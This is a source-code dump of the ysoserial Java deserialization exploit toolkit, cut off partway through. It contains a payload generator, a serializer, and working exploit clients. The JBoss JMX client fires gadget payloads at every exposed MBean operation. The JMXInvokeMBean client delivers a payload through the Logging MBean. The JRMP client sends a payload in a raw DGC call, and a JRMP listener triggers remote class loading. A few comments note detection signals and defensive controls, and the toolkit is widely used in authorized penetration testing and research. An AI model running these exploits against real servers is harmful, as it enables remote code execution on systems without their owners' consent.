			<name>GitHub Packages</name>
			<url>https://maven.pkg.github.com/frohoff/ysoserial</url>
		</repository>
	</distributionManagement>	
</project>


================================================
FILE: src/main/java/ysoserial/Deserializer.java
================================================
package ysoserial;

import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.util.concurrent.Callable;

public class Deserializer implements Callable<Object> {
	private final byte[] bytes;

	public Deserializer(byte[] bytes) { this.bytes = bytes; }

	public Object call() throws Exception {
		return deserialize(bytes);
	}

	public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
		final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
		return deserialize(in);
	}

	public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
		final ObjectInputStream objIn = new ObjectInputStream(in);
		return objIn.readObject();
	}

	public static void main(String[] args) throws ClassNotFoundException, IOException {
		final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
		Object object = deserialize(in);
	}
}

================================================
FILE: src/main/java/ysoserial/GeneratePayload.java
================================================
package ysoserial;

import java.io.PrintStream;
import java.util.*;

import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;

@SuppressWarnings("rawtypes")
public class GeneratePayload {
	private static final int INTERNAL_ERROR_CODE = 70;
	private static final int USAGE_CODE = 64;

	/**
	 * Command-line entry point: {@code [payload] '[command]'}.
	 *
	 * Looks up the payload class by name, asks it to build an object for the given command
	 * string and writes that object to standard output as a raw Java serialization stream.
	 * All diagnostics go to standard error so they never mix with the binary output.
	 * Exit status: 0 on success, {@code USAGE_CODE} (64) for bad arguments or an unknown
	 * payload type, {@code INTERNAL_ERROR_CODE} (70) when generation or serialization fails.
	 *
	 * The output is produced by {@link java.io.ObjectOutputStream}, so it starts with the
	 * standard stream header (bytes AC ED 00 05), which is what content inspection for
	 * serialized Java objects usually keys on.
	 */
	public static void main(final String[] args) {
		if (args.length != 2) {
			printUsage();
			System.exit(USAGE_CODE);
		}
		final String typeName = args[0];
		final String commandArg = args[1];

		final Class<? extends ObjectPayload> chosen = Utils.getPayloadClass(typeName);
		if (chosen == null) {
			System.err.println("Invalid payload type '" + typeName + "'");
			printUsage();
			System.exit(USAGE_CODE);
			return; // only here to satisfy null analysis
		}

		try {
			final ObjectPayload generator = chosen.newInstance();
			final Object gadget = generator.getObject(commandArg);
			Serializer.serialize(gadget, System.out);
			// gives the payload a chance to release whatever it allocated for this object
			ObjectPayload.Utils.releasePayload(generator, gadget);
		} catch (Throwable failure) {
			System.err.println("Error while generating or serializing payload");
			failure.printStackTrace();
			System.exit(INTERNAL_ERROR_CODE);
		}
		System.exit(0);
	}

	/**
	 * Prints the usage line and a table of the available payload types (name, authors,
	 * dependencies) to standard error, sorted by the classes' string form.
	 */
	private static void printUsage() {
		System.err.println("Y SO SERIAL?");
		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
		System.err.println("  Available payload types:");

		final List<Class<? extends ObjectPayload>> sorted =
			new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
		Collections.sort(sorted, new Strings.ToStringComparator());

		// header, separator, then one row per payload class
		final List<String[]> table = new LinkedList<String[]>();
		table.add(new String[] {"Payload", "Authors", "Dependencies"});
		table.add(new String[] {"-------", "-------", "------------"});
		for (Class<? extends ObjectPayload> entry : sorted) {
			final String authors =
				Strings.join(Arrays.asList(Authors.Utils.getAuthors(entry)), ", ", "@", "");
			final String deps =
				Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(entry)), ", ", "", "");
			table.add(new String[] { entry.getSimpleName(), authors, deps });
		}

		for (String line : Strings.formatTable(table)) {
			System.err.println("     " + line);
		}
	}
}


================================================
FILE: src/main/java/ysoserial/Serializer.java
================================================
package ysoserial;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.util.concurrent.Callable;

public class Serializer implements Callable<byte[]> {
	private final Object object;
	public Serializer(Object object) {
		this.object = object;
	}

	public byte[] call() throws Exception {
		return serialize(object);
	}

	public static byte[] serialize(final Object obj) throws IOException {
		final ByteArrayOutputStream out = new ByteArrayOutputStream();
		serialize(obj, out);
		return out.toByteArray();
	}

	public static void serialize(final Object obj, final OutputStream out) throws IOException {
		final ObjectOutputStream objOut = new ObjectOutputStream(out);
		objOut.writeObject(obj);
	}

}

================================================
FILE: src/main/java/ysoserial/Strings.java
================================================
package ysoserial;

import org.apache.commons.lang.StringUtils;

import java.util.Arrays;
import java.util.Comparator;
import java.util.LinkedList;
import java.util.List;

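/** Small string helpers used for the command-line usage output. */
public class Strings {
    /**
     * Concatenates {@code strings}, wrapping every element in {@code prefix}/{@code suffix}
     * and placing {@code sep} between consecutive elements.
     *
     * @param strings elements to join; a null element is appended as the text "null"
     * @param sep separator placed between elements
     * @param prefix text put before every element, or null for none
     * @param suffix text put after every element, or null for none
     * @return the joined string, empty when there are no elements
     */
    public static String join(Iterable<String> strings, String sep, String prefix, String suffix) {
        final StringBuilder sb = new StringBuilder();
        boolean first = true;
        for (String s : strings) {
            if (! first) sb.append(sep);
            if (prefix != null) sb.append(prefix);
            sb.append(s);
            if (suffix != null) sb.append(suffix);
            first = false;
        }
        return sb.toString();
    }

    /**
     * Returns {@code str} repeated {@code num} times.
     *
     * @param str the text to repeat
     * @param num number of repetitions; zero or a negative value yields the empty string
     */
    public static String repeat(String str, int num) {
        final StringBuilder sb = new StringBuilder();
        for (int i = 0; i < num; i++) {
            sb.append(str);
        }
        return sb.toString();
    }

    /**
     * Formats rows of cells as left-aligned, space-padded columns, one output line per row.
     * Every column is as wide as its longest cell and columns are separated by one space.
     * The input arrays are not modified.
     *
     * @param rows the table; all rows must have as many cells as the first one
     * @return the formatted lines, empty when {@code rows} is null or empty
     * @throws IllegalStateException if a row has a different number of cells than the first
     */
    public static List<String> formatTable(List<String[]> rows) {
        final List<String> lines = new LinkedList<String>();
        if (rows == null || rows.isEmpty()) {
            return lines; // nothing to format; avoids rows.get(0) on an empty list
        }

        final int columns = rows.get(0).length;
        final int[] widths = new int[columns];
        for (String[] row : rows) {
            if (row.length != columns) throw new IllegalStateException("mismatched columns");
            for (int i = 0; i < columns; i++) {
                widths[i] = Math.max(widths[i], row[i].length());
            }
        }

        for (String[] row : rows) {
            // pad into a copy so the caller's arrays keep their original content
            final String[] padded = new String[columns];
            for (int i = 0; i < columns; i++) {
                padded[i] = row[i] + repeat(" ", widths[i] - row[i].length());
            }
            lines.add(join(Arrays.asList(padded), " ", "", ""));
        }
        return lines;
    }

    /** Orders arbitrary objects by the natural order of their {@code toString()} values. */
    public static class ToStringComparator implements Comparator<Object> {
        public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
    }
}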


================================================
FILE: src/main/java/ysoserial/exploit/JBoss.java
================================================
package ysoserial.exploit;


import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.InetSocketAddress;
import java.net.MalformedURLException;
import java.net.SocketAddress;
import java.net.URI;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.security.NoSuchProviderException;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.Executor;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.logging.Handler;
import java.util.logging.Level;
import java.util.logging.LogManager;
import java.util.logging.LogRecord;
import java.util.logging.Logger;

import javax.management.InstanceNotFoundException;
import javax.management.IntrospectionException;
import javax.management.MBeanInfo;
import javax.management.MBeanOperationInfo;
import javax.management.MBeanServerConnection;
import javax.management.ObjectInstance;
import javax.management.ReflectionException;
import javax.management.remote.JMXServiceURL;
import javax.security.auth.callback.Callback;
import javax.security.auth.callback.CallbackHandler;
import javax.security.auth.callback.NameCallback;
import javax.security.auth.callback.PasswordCallback;
import javax.security.auth.callback.UnsupportedCallbackException;
import javax.security.sasl.RealmCallback;

import org.jboss.remoting3.Channel;
import org.jboss.remoting3.Connection;
import org.jboss.remoting3.Endpoint;
import org.jboss.remoting3.OpenListener;
import org.jboss.remoting3.Remoting;
import org.jboss.remoting3.remote.HttpUpgradeConnectionProviderFactory;
import org.jboss.remoting3.spi.ConnectionHandler;
import org.jboss.remoting3.spi.ConnectionHandlerContext;
import org.jboss.remoting3.spi.ConnectionHandlerFactory;
import org.jboss.remoting3.spi.ConnectionProvider;
import org.jboss.remoting3.spi.ConnectionProviderContext;
import org.jboss.remoting3.spi.RegisteredService;
import org.jboss.remotingjmx.VersionedConnection;
import org.xnio.FutureResult;
import org.xnio.IoFuture;
import org.xnio.IoFuture.Status;
import org.xnio.OptionMap;
import org.xnio.Options;
import org.xnio.Xnio;
import org.xnio.XnioWorker;
import org.xnio.ssl.JsseXnioSsl;
import org.xnio.ssl.XnioSsl;

import ysoserial.payloads.ObjectPayload.Utils;
import ysoserial.payloads.util.Reflections;


/**
 *
 * An exploitation client for JBoss AS/Wildfly JMX
 *
 * JBoss is using a custom tunneled protocol for JMX, this is a client for this protocol.
 *
 * This is not as readily exploitable as in other pieces of software:
 * 1. they only allow authenticated access by default
 * 2. they have a very strict module architecture:
 * - all MBeans exported by default use classloaders that expose almost nothing useful
 * - the module classloaders do not even expose the full boot classpath, so we cannot readily use stuff like
 * com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
 *
 * This client enumerates all application-exported MBean methods, which are then called,
 * delivering the specified payload.
 *
 * I.e. you can successfully exploit this if
 * - you have access to the interface
 *    (username/password can be specified via URL, note: although it is not noticeable,
 *    local connections implicitly use authentication)
 * - there is an application exported MBean
 * - that application imports the classes required for the gadget chain
 *
 * @author mbechler
 *
 */
@SuppressWarnings ( {
    "rawtypes"
} )
public class JBoss {

    /**
     * Command-line entry point: {@code <uri> <payload> <payload_arg>}.
     *
     * Builds the payload object, takes optional credentials from the URI's user-info part
     * ({@code user:password@}), runs one connection attempt and releases the payload.
     */
    public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
            System.exit(-1);
        }

        URI u = URI.create(args[ 0 ]);

        final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);

        // credentials stay null when the URI carries no user-info part
        String username = null;
        String password = null;
        if ( u.getUserInfo() != null ) {
            int sep = u.getUserInfo().indexOf(':');
            if ( sep >= 0 ) {
                username = u.getUserInfo().substring(0, sep);
                password = u.getUserInfo().substring(sep + 1);
            }
            else {
                System.err.println("Need <user>:<password>@");
                System.exit(-1);
            }
        }

        doRun(u, payloadObject, username, password);
        Utils.releasePayload(args[1], payloadObject);
    }


    /**
     * Performs one complete run: connect, open the "jmx" channel, obtain an
     * {@link MBeanServerConnection} and hand it to {@link #doExploit}. Any failure is printed
     * to stderr rather than propagated, and {@link #cleanup} always runs.
     *
     * @param u target URI; TLS is enabled only when its scheme is exactly "https", and port
     *          9990 is used when the URI names none
     * @param payloadObject object passed as the argument of the MBean invocations
     * @param username user name for the authentication callbacks, may be null
     * @param password password for the authentication callbacks, may be null
     */
    private static void doRun ( URI u, final Object payloadObject, String username, String password ) {
        ConnectionProvider instance = null;
        ConnectionProviderContextImpl context = null;
        ConnectionHandler ch = null;
        Channel c = null;
        VersionedConnection vc = null;
        try {
            // route java.util.logging output of the libraries to stderr at INFO level
            Logger logger = LogManager.getLogManager().getLogger("");
            logger.addHandler(new ConsoleLogHandler());
            logger.setLevel(Level.INFO);
            // NOTE(review): getScheme() is null for a scheme-less URI; the resulting
            // NullPointerException ends up in the catch block below
            OptionMap options = OptionMap.builder().set(Options.SSL_ENABLED, u.getScheme().equals("https")).getMap();
            context = new ConnectionProviderContextImpl(options, "endpoint");
            instance = new HttpUpgradeConnectionProviderFactory().createInstance(context, options);
            String host = u.getHost();
            int port = u.getPort() > 0 ? u.getPort() : 9990;
            SocketAddress destination = new InetSocketAddress(host, port);
            ConnectionHandlerFactory chf = getConnection(destination, username, password, context, instance, options);
            ch = chf.createInstance(new ConnectionHandlerContextImpl(context));
            c = getChannel(context, ch, options);
            System.err.println("Connected");
            vc = makeVersionedConnection(c);
            MBeanServerConnection mbc = vc.getMBeanServerConnection(null);
            doExploit(payloadObject, mbc);
            System.err.println("DONE");
        }
        catch ( Throwable e ) {
            e.printStackTrace(System.err);
        }
        finally {
            cleanup(instance, context, ch, c, vc);
        }
    }



    /**
     * Closes whatever {@link #doRun} managed to create, in reverse order of creation:
     * versioned connection, channel, connection handler, provider, then the XNIO worker.
     * Every argument may be null. An IOException from one close is printed and does not
     * stop the remaining ones.
     */
    private static void cleanup ( ConnectionProvider instance, ConnectionProviderContextImpl context, ConnectionHandler ch, Channel c,
            VersionedConnection vc ) {
        if ( vc != null ) {
            vc.close();
        }

        if ( c != null ) {
            try {
                c.close();
            }
            catch ( IOException e ) {
                e.printStackTrace(System.err);
            }
        }

        if ( ch != null ) {
            try {
                ch.close();
            }
            catch ( IOException e ) {
                e.printStackTrace(System.err);
            }
        }
        if ( instance != null ) {
            try {
                instance.close();
            }
            catch ( IOException e ) {
                e.printStackTrace(System.err);
            }
        }

        if ( context != null ) {
            context.getXnioWorker().shutdown();
        }
    }


    /**
     * Starts the connection to {@code destination} and waits up to five seconds for it.
     *
     * The callback handler answers name and password callbacks with the supplied
     * credentials (an empty password when {@code password} is null), lets realm callbacks
     * pass untouched and rejects every other callback type.
     *
     * @return the factory produced by the completed connection attempt
     */
    private static ConnectionHandlerFactory getConnection ( SocketAddress destination, final String username, final String password,
            ConnectionProviderContextImpl context, ConnectionProvider instance, OptionMap options )
                    throws IOException, InterruptedException, KeyManagementException, NoSuchProviderException, NoSuchAlgorithmException {
        // NOTE(review): built from the same options as the connection; whether it is used
        // depends on SSL_ENABLED, which doRun derives from the URI scheme
        XnioSsl xnioSsl = new JsseXnioSsl(context.getXnio(), options);
        FutureResult<ConnectionHandlerFactory> result = new FutureResult<ConnectionHandlerFactory>();
        instance.connect(null, destination, options, result, new CallbackHandler() {

            public void handle ( Callback[] callbacks ) throws IOException, UnsupportedCallbackException {

                for ( Callback cb : callbacks ) {

                    if ( cb instanceof NameCallback ) {
                        ( (NameCallback) cb ).setName(username);
                    }
                    else if ( cb instanceof PasswordCallback ) {
                        ( (PasswordCallback) cb ).setPassword(password != null ? password.toCharArray() : new char[0]);
                    }
                    else if ( !( cb instanceof RealmCallback) ) {
                        System.err.println(cb);
                        throw new UnsupportedCallbackException(cb);
                    }
                }
            }
        }, xnioSsl);

        System.err.println("waiting for connection");
        IoFuture<ConnectionHandlerFactory> ioFuture = result.getIoFuture();
        Status s = ioFuture.await(5, TimeUnit.SECONDS);
        if ( s == Status.FAILED ) {
            // only reported here; execution continues to getInterruptibly() below,
            // which presumably rethrows the failure - TODO confirm
            System.err.println("Cannot connect");
            if ( ioFuture.getException() != null ) {
                ioFuture.getException().printStackTrace(System.err);
            }
        }
        else if ( s != Status.DONE ) {
            // neither failed nor done after the wait: give up and terminate the JVM
            ioFuture.cancel();
            System.err.println("Connect timeout");
            System.exit(-1);
        }

        ConnectionHandlerFactory chf = ioFuture.getInterruptibly();
        return chf;
    }

    /**
     * Opens the "jmx" service channel on an established connection and waits for it.
     *
     * @throws IOException if opening the channel fails with an exception, or ends in a
     *                     state that is neither DONE nor FAILED
     */
    private static Channel getChannel ( ConnectionProviderContextImpl context, ConnectionHandler ch, OptionMap options ) throws IOException {
        Channel c;
        FutureResult<Channel> chResult = new FutureResult<Channel>(context.getExecutor());
        ch.open("jmx", chResult, options);

        IoFuture<Channel> cFuture = chResult.getIoFuture();
        // unlike getConnection(), this wait has no time limit
        Status s2 = cFuture.await();
        if ( s2 == Status.FAILED ) {
            System.err.println("Cannot connect");
            if ( cFuture.getException() != null ) {
                throw new IOException("Connect failed", cFuture.getException());
            }
        }
        else if ( s2 != Status.DONE ) {
            cFuture.cancel();
            throw new IOException("Connect timeout");
        }

        c = cFuture.get();
        return c;
    }


    /**
     * Wraps the channel in a {@link VersionedConnection} by reflectively calling the
     * factory method {@code createVersionedConnection}, which is made accessible first.
     */
    private static VersionedConnection makeVersionedConnection ( Channel c )
            throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, MalformedURLException {
        VersionedConnection vc;
        // NOTE(review): the class name is spelled "Conection" in this string; presumably that
        // matches the library's own spelling - check the library before "correcting" it
        Class<?> vcf = Class.forName("org.jboss.remotingjmx.VersionedConectionFactory");
        Method vcCreate = vcf.getDeclaredMethod("createVersionedConnection", Channel.class, Map.class, JMXServiceURL.class);
        Reflections.setAccessible(vcCreate);
        vc = (VersionedConnection) vcCreate.invoke(null, c, new HashMap(), new JMXServiceURL("service:jmx:remoting-jmx://"));
        return vc;
    }


    /**
     * Walks every MBean the server reports and calls its operations with the payload as the
     * single argument and an empty signature, stopping at the first call that either returns
     * or fails with something other than a ClassNotFoundException.
     *
     * Seen from the server, one run is therefore a sequence of JMX invocations across many
     * unrelated MBean operations, each with one argument and no signature, most of them
     * failing. That pattern is what logging and monitoring on the management interface can
     * look for.
     */
    private static void doExploit ( final Object payloadObject, MBeanServerConnection mbc )
            throws IOException, InstanceNotFoundException, IntrospectionException, ReflectionException {
        Object[] params = new Object[1];
        params[ 0 ] = payloadObject;
        System.err.println("Querying MBeans");
        Set<ObjectInstance> testMBeans = mbc.queryMBeans(null, null);
        System.err.println("Found " + testMBeans.size() + " MBeans");
        for ( ObjectInstance oi : testMBeans ) {
            MBeanInfo mBeanInfo = mbc.getMBeanInfo(oi.getObjectName());
            for ( MBeanOperationInfo opInfo : mBeanInfo.getOperations() ) {
                try {
                    mbc.invoke(oi.getObjectName(), opInfo.getName(), params, new String[] {});
                    System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> SUCCESS");
                    return;
                }
                catch ( Throwable e ) {
                    // NOTE(review): getMessage() can be null; startsWith() would then throw a
                    // NullPointerException out of this catch block and end the loop
                    String msg = e.getMessage();
                    if ( msg.startsWith("java.lang.ClassNotFoundException:") ) {
                        // the module name is taken from between the first pair of double quotes
                        int start = msg.indexOf('"');
                        int stop = msg.indexOf('"', start + 1);
                        String module = ( start >= 0 && stop > 0 ) ? msg.substring(start + 1, stop) : "<unknown>";
                        if ( !"<unknown>".equals(module) && !"org.jboss.as.jmx:main".equals(module) ) {
                            // the class name is the text between ": " and the next space
                            int cstart = msg.indexOf(':');
                            int cend = msg.indexOf(' ', cstart + 2);
                            String cls = msg.substring(cstart + 2, cend);
                            System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> FAIL CNFE " + cls + " (" + module + ")");
                        }
                    }
                    else {
                        System.err.println(oi.getObjectName() + ":" + opInfo.getName() + " -> SUCCESS|ERROR " + msg);
                        return;
                    }
                }
            }
        }
    }


    /** Log handler that prints the raw message of every record to stderr. */
    private static final class ConsoleLogHandler extends Handler {


        @Override
        public void publish ( LogRecord record ) {
            // raw message only: no level, timestamp or attached throwable
            System.err.println(record.getMessage());
        }


        @Override
        public void flush () {

        }


        @Override
        public void close () throws SecurityException {}
    }

    /**
     * Minimal {@link ConnectionHandlerContext}: it only hands back the provider context.
     * Service and connection lookups return null and remote-close notifications are ignored.
     */
    @SuppressWarnings({"deprecation"})
    private static final class ConnectionHandlerContextImpl implements ConnectionHandlerContext {

        private ConnectionProviderContextImpl context;


        public ConnectionHandlerContextImpl ( ConnectionProviderContextImpl context ) {
            this.context = context;
        }


        public void remoteClosed () {}


        public OpenListener getServiceOpenListener ( String serviceType ) {
            return null;
        }


        public RegisteredService getRegisteredService ( String serviceType ) {
            return null;
        }


        public ConnectionProviderContext getConnectionProviderContext () {
            return this.context;
        }


        public Connection getConnection () {
            return null;
        }
    }


    /**
     * {@link ConnectionProviderContext} that owns the XNIO worker, the remoting endpoint and
     * a cached pool of daemon threads named "Worker".
     */
    private static final class ConnectionProviderContextImpl implements ConnectionProviderContext {

        private XnioWorker worker;
        private ExecutorService executor;
        private Xnio instance;
        private Endpoint endpoint;


        public ConnectionProviderContextImpl ( OptionMap opts, String endpointName ) throws IllegalArgumentException, IOException {
            this.instance = Xnio.getInstance();

            this.worker = this.instance.createWorker(opts);
            this.endpoint = Remoting.createEndpoint(endpointName, this.worker, opts);
            this.executor = Executors.newCachedThreadPool(new ThreadFactory() {

                public Thread newThread ( Runnable r ) {
                    Thread t = new Thread(r, "Worker");
                    // daemon threads, so this pool never keeps the JVM alive
                    t.setDaemon(true);
                    return t;
                }
            });
        }


        public XnioWorker getXnioWorker () {
            return this.worker;
        }


        public Xnio getXnio () {
            return this.instance;
        }


        public Executor getExecutor () {
            return this.executor;
        }


        public Endpoint getEndpoint () {
            return this.endpoint;
        }


        // inbound connections are not handled; the call is only logged
        public void accept ( ConnectionHandlerFactory connectionHandlerFactory ) {
            System.err.println("accept");
        }

    }

}


================================================
FILE: src/main/java/ysoserial/exploit/JMXInvokeMBean.java
================================================
package ysoserial.exploit;

import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

import ysoserial.payloads.ObjectPayload.Utils;

/*
 * Utility program for exploiting RMI based JMX services running with required gadgets available in their ClassLoader.
 * Attempts to exploit the service by invoking a method on an exposed MBean, passing the payload as argument.
 * 
 */
public class JMXInvokeMBean {

	/**
	 * Command-line entry point: {@code <host> <port> <payload_type> <payload_arg>}.
	 *
	 * Connects to the JMX/RMI service at the given host and port, builds the payload object
	 * and passes it as the only argument of {@code getLoggerLevel} on the
	 * {@code java.util.logging:type=Logging} MBean, declared with a String signature.
	 *
	 * The connection is opened without an environment map, so no credentials are presented.
	 * For anyone operating a JMX endpoint the relevant controls are therefore authentication
	 * on the connector, network restriction of the JMX/RMI port, and a serialization filter
	 * on the JVM that limits which classes may arrive as call arguments.
	 */
	public static void main(String[] args) throws Exception {

		if ( args.length < 4 ) {
			System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
			System.exit(-1);
		}

		final String host = args[0];
		final String port = args[1];
		JMXServiceURL serviceUrl = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + host + ":" + port + "/jmxrmi");

		JMXConnector connector = JMXConnectorFactory.connect(serviceUrl);
		MBeanServerConnection connection = connector.getMBeanServerConnection();

		// the payload is built only after the connection is up
		Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
		ObjectName loggingBean = new ObjectName("java.util.logging:type=Logging");

		final Object[] callArguments = new Object[]{payloadObject};
		final String[] callSignature = new String[]{String.class.getCanonicalName()};
		connection.invoke(loggingBean, "getLoggerLevel", callArguments, callSignature);

		// reached only when invoke() returned normally; an exception leaves the connector open
		connector.close();
	}
}

================================================
FILE: src/main/java/ysoserial/exploit/JRMPClassLoadingListener.java
================================================
package ysoserial.exploit;



import java.net.URL;


/**
 * JRMP listener triggering RMI remote classloading
 * 
 * Opens up a JRMP listener that will deliver a remote classpath class to the calling client.
 * 
 * Mostly CVE-2013-1537 (presumably, does not state details) with the difference that you don't need
 * access to an RMI socket when you can deliver {@link ysoserial.payloads.JRMPClient}.
 * 
 * This only works if
 * - the remote end is running with a security manager
 * - java.rmi.server.useCodebaseOnly=false (default until 7u21) 
 * - the remote has the proper permissions to remotely load the class (mostly URLPermission)
 * 
 * and, of course, the payload class is then run under the security manager with a remote codebase
 * so either the policy needs to allow whatever you want to do in the payload or you need to combine
 * with a security manager bypass exploit (wouldn't be the first time).
 * 
 * @author mbechler
 *
 */
public class JRMPClassLoadingListener {

    /**
     * Command-line entry point: {@code <port> <url> <className>}.
     *
     * Starts a {@link JRMPListener} on the given port, configured with the class name and
     * the codebase URL, and runs it on the calling thread. Bad arguments (non-numeric port,
     * malformed URL) and listener failures are reported on stderr and end the program.
     */
    public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPClassLoadingListener.class.getName() + " <port> <url> <className>");
            System.exit(-1);
            return;
        }

        try {
            final int listenPort = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + listenPort);
            // argument order on the command line is <url> then <className>;
            // the constructor takes them the other way round
            final String className = args[ 2 ];
            final URL codebase = new URL(args[ 1 ]);
            final JRMPListener listener = new JRMPListener(listenPort, className, codebase);
            listener.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
    }

}


================================================
FILE: src/main/java/ysoserial/exploit/JRMPClient.java
================================================
package ysoserial.exploit;


import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.UnknownHostException;

import javax.net.SocketFactory;

import sun.rmi.transport.TransportConstants;
import ysoserial.payloads.ObjectPayload.Utils;


/**
 * Generic JRMP client
 * 
 * Pretty much the same thing as {@link RMIRegistryExploit} but 
 * - targeting the remote DGC (Distributed Garbage Collection, always there if there is a listener)
 * - not deserializing anything (so you don't get yourself exploited ;))
 * 
 * @author mbechler
 *
 */
@SuppressWarnings ( {
    "restriction"
} )
public class JRMPClient {

    /**
     * Command-line entry point: {@code <host> <port> <payload_type> <payload_arg>}.
     *
     * Builds the payload object, sends it with {@link #makeDGCCall} and releases it again.
     * A failure while sending is printed to stderr and does not change the exit status.
     */
    public static final void main ( final String[] args ) {
        if ( args.length < 4 ) {
            System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
        String hostname = args[ 0 ];
        int port = Integer.parseInt(args[ 1 ]);
        try {
            System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
            makeDGCCall(hostname, port, payloadObject);
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[2], payloadObject);
    }

    /**
     * Opens a TCP connection and writes a single JRMP call whose argument is
     * {@code payloadObject}. Nothing is ever read from the socket, so the peer's reply is
     * not deserialized on this side.
     *
     * The receiving end is the DGC service of the peer (see the class comment). What it
     * accepts as a call argument is governed by the peer JVM's serialization filtering for
     * RMI, so that filter and network access to the JRMP port are the controls that matter
     * on the receiving side.
     *
     * @param hostname peer host name or address
     * @param port peer TCP port
     * @param payloadObject object written as the call argument
     * @throws IOException if connecting or writing fails
     */
    public static void makeDGCCall ( String hostname, int port, Object payloadObject ) throws IOException, UnknownHostException, SocketException {
        // NOTE(review): never used afterwards; the socket below is created from hostname/port directly
        InetSocketAddress isa = new InetSocketAddress(hostname, port);
        Socket s = null;
        DataOutputStream dos = null;
        try {
            s = SocketFactory.getDefault().createSocket(hostname, port);
            s.setKeepAlive(true);
            s.setTcpNoDelay(true);

            OutputStream os = s.getOutputStream();
            dos = new DataOutputStream(os);

            // JRMP transport header: magic, version, single-operation protocol
            dos.writeInt(TransportConstants.Magic);
            dos.writeShort(TransportConstants.Version);
            dos.writeByte(TransportConstants.SingleOpProtocol);

            // message type: call
            dos.write(TransportConstants.Call);

            @SuppressWarnings ( "resource" )
            final ObjectOutputStream objOut = new MarshalOutputStream(dos);

            // call header; the statement order below is the wire format, do not reorder
            objOut.writeLong(2); // DGC
            objOut.writeInt(0);
            objOut.writeLong(0);
            objOut.writeShort(0);

            objOut.writeInt(1); // dirty
            objOut.writeLong(-669196253586618813L);
            
            objOut.writeObject(payloadObject);

            os.flush();
        }
        finally {
            // closing dos also closes the socket's output stream; the socket is closed explicitly as well
            if ( dos != null ) {
                dos.close();
            }
            if ( s != null ) {
                s.close();
            }
        }
    }

    /**
     * {@link ObjectOutputStream} that writes a codebase annotation after every class
     * descriptor: the fixed URL when one was given, otherwise a value derived from the
     * class's own class loader.
     */
    static final class MarshalOutputStream extends ObjectOutputStream {
        
        
        // codebase to announce for every class; null when the one-argument constructor was used
        private URL sendUrl;

        public MarshalOutputStream (OutputStream out, URL u) throws IOException {
            super(out);
            this.sendUrl = u;
        }

        MarshalOutputStream ( OutputStream out ) throws IOException {
            super(out);
        }

        /**
         * Writes the codebase annotation for {@code cl}: the configured URL if there is one,
         * null when the class was not loaded by a {@link URLClassLoader}, and otherwise the
         * URLs of that loader.
         */
        @Override
        protected void annotateClass ( Class<?> cl ) throws IOException {
            if ( this.sendUrl != null ) {
                writeObject(this.sendUrl.toString());
            } else if ( ! ( cl.getClassLoader() instanceof URLClassLoader ) ) {
                writeObject(null);
            }
            else {
                URL[] us = ( (URLClassLoader) cl.getClassLoader() ).getURLs();
                String cb = "";
                
                // NOTE(review): the URLs are concatenated with no separator between them;
                // confirm whether a space-separated list was intended
                for ( URL u : us ) {
                    cb += u.toString();
                }
                writeObject(cb);
            }
        }


        /**
         * Serializes a location from which to load the specified class.
         * Proxy classes get the same annotation as ordinary classes.
         */
        @Override
        protected void annotateProxyClass ( Class<?> cl ) throws IOException {
            annotateClass(cl);
        }
    }

 
}


================================================
FILE: src/main/java/ysoserial/exploit/JRMPListener.java
================================================
package ysoserial.exploit;


import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.io.Serializable;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.net.SocketException;
import java.net.URL;
import java.rmi.MarshalException;
import java.rmi.server.ObjID;
import java.rmi.server.UID;
import java.util.Arrays;

